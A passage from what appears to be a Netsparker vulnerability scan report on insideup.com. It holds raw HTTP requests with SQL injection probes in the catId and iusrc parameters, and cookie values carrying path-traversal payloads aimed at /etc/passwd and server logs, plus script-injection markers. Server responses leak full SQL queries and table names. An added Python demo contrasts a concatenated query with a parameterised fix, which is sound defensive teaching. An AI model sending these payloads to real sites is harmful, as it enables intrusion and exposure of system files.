convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/lodi00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q2ftsggmpem9ckgjsam91hss84; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
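What the three request/response pairs above actually prove: the page takes its own path and both GET parameters (catId, iusrc) and splices them into a quoted SQL literal, then echoes the finished query and the MySQL error text back to the client in a 200 response. The probe itself is an MSSQL-flavoured one (convert(int, ...) FROM syscolumns), and MySQL rejects it with a plain syntax error near 'int,CHAR(95)...' instead of the conversion error it was designed to trigger; the finding is still confirmed because the server hands back the whole statement with the single quote unbalanced exactly where the parameter was inserted. The CHAR() chain is just the scanner's marker string, built character by character so that no quotes appear in it. The example below is added here and is not Netsparker's code or insideup.com's code: it decodes that marker, rebuilds the lookup the way the leaked query shows it was built, and sets the parameterised form beside it. It uses Python's sqlite3 in place of the site's MySQL, a single table in place of the five lead_flow_*_pages_details tables the real query unions, and one constructed sample row; table and column names are taken from the query in the response.

```python
import re
import sqlite3

# Netsparker's error-based SQL injection probe, copied (URL-decoded) from the
# 'catId' parameter in the /ppc/leadflow/lodi00/project.php request above.
PROBE = ("'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)"
         "+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'")


def decode_char_chain(payload: str) -> str:
    """Spell out the CHAR(n)+CHAR(m)+... chain in a probe.

    The chain lets the scanner carry a recognisable marker without putting
    any quote characters into the parameter; it only becomes a string once
    the database evaluates it.
    """
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", payload))


def build_query_unsafe(page: str, cat_id: str, iusrc: str) -> str:
    """Rebuild the lookup the way the leaked query shows it was built: the
    request path and both GET parameters are concatenated straight into a
    quoted literal, so a single quote in either parameter closes the literal.
    (One table here; the site's real query unions five lead_flow_* tables.)"""
    url = f"leadflow/{page}/project.php?catId={cat_id}&iusrc={iusrc}"
    return ("select catId, groupId, templateId, project_page_url "
            "from lead_flow_one_pages_details "
            f"where project_page_url = '{url}' OR project_page_url = '{url}/'")


# Same lookup with the URL bound as a parameter instead of spliced in.
SAFE_QUERY = ("select catId, groupId, templateId, project_page_url "
              "from lead_flow_one_pages_details "
              "where project_page_url = ? OR project_page_url = ?")


def lookup_unsafe(conn, page, cat_id, iusrc):
    """Returns ('rows', [...]) or ('error', message).

    The live site returned the message, together with the whole statement,
    to the client with HTTP 200; that echo is what let the scanner mark the
    injection as confirmed rather than merely identified."""
    try:
        return "rows", conn.execute(build_query_unsafe(page, cat_id, iusrc)).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def lookup_safe(conn, page, cat_id, iusrc):
    """Parameterised version: the probe is an odd string that matches no row,
    and the database never sees it as SQL."""
    url = f"leadflow/{page}/project.php?catId={cat_id}&iusrc={iusrc}"
    return "rows", conn.execute(SAFE_QUERY, (url, url + "/")).fetchall()


def demo_db():
    """In-memory stand-in for the site's MySQL schema with one constructed row;
    the real table contents are not in the report."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table lead_flow_one_pages_details "
                 "(catId integer, groupId integer, templateId integer, project_page_url text)")
    conn.execute("insert into lead_flow_one_pages_details values (?, ?, ?, ?)",
                 (30005, 1, 1, "leadflow/lodi00/project.php?catId=30005&iusrc=iupsc"))
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print("marker:", decode_char_chain(PROBE))
    print("benign, unsafe:", lookup_unsafe(conn, "lodi00", "30005", "iupsc"))
    print("probe,  unsafe:", lookup_unsafe(conn, "lodi00", PROBE, "iupsc"))
    print("probe,  safe:  ", lookup_safe(conn, "lodi00", PROBE, "iupsc"))
```

The benign request returns the sample row through either path; the probe makes the concatenated statement fail at prepare time (the real site's MySQL failed the same way, on the convert(int, ...) syntax) while the bound-parameter statement simply returns no rows. On the PHP 5.2.6 stack the response headers advertise, the equivalent fix is a mysqli or PDO prepared statement with the URL passed as a bound value, plus turning off display of database errors to the client, since the echoed query also leaks the table names and the `OR ... + '/'` matching logic for every page under /ppc/leadflow/.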
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80011
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/obtm00/project.php?catId=80011&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gl0kppmln10thkr3lhe37qd3a6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId=80011&iusrc='+ (select 
